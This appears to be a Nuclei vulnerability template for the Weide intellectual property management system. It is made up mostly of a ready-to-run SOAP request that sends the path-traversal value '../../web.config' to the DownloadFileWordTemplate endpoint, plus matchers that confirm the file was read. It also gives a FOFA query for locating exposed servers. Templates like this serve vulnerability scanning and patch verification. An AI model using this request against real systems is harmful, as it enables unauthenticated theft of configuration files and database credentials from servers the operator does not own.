http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - PD94bWwg
            - <?xml version="1.0"
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /AutoUpdate/WSFM.asmx HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
          Content-Type: text/xml; charset=utf-8
          SOAPAction: "http://tempuri.org/DownloadFileWordTemplate"

          <?xml version="1.0" encoding="utf-8"?>
          <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
            <soap:Body>
              <DownloadFileWordTemplate xmlns="http://tempuri.org/">
                <fileName>../../web.config</fileName>
              </DownloadFileWordTemplate>
            </soap:Body>
          </soap:Envelope>
id: weide-DownloadFileWordTemplate-File-reading
info:
    author: Superhero
    description: |-
        fofa: body="JSCOMM/language.js"
        唯徳知识产权管理系统 DownloadFileWordTemplate 接口存在文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
    name: 唯徳知识产权管理系统 DownloadFileWordTemplate 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247487624&idx=1&sn=17a2b125651981f018216434453affd1&chksm=c267a5bbf5102cad6edf64735480cc1384ed3f8ef78b0263d7b2ce1d40c2a4e16c26245215d3&token=1439003696&lang=zh_CN#rd
    severity: high
    tags:
        - File reading
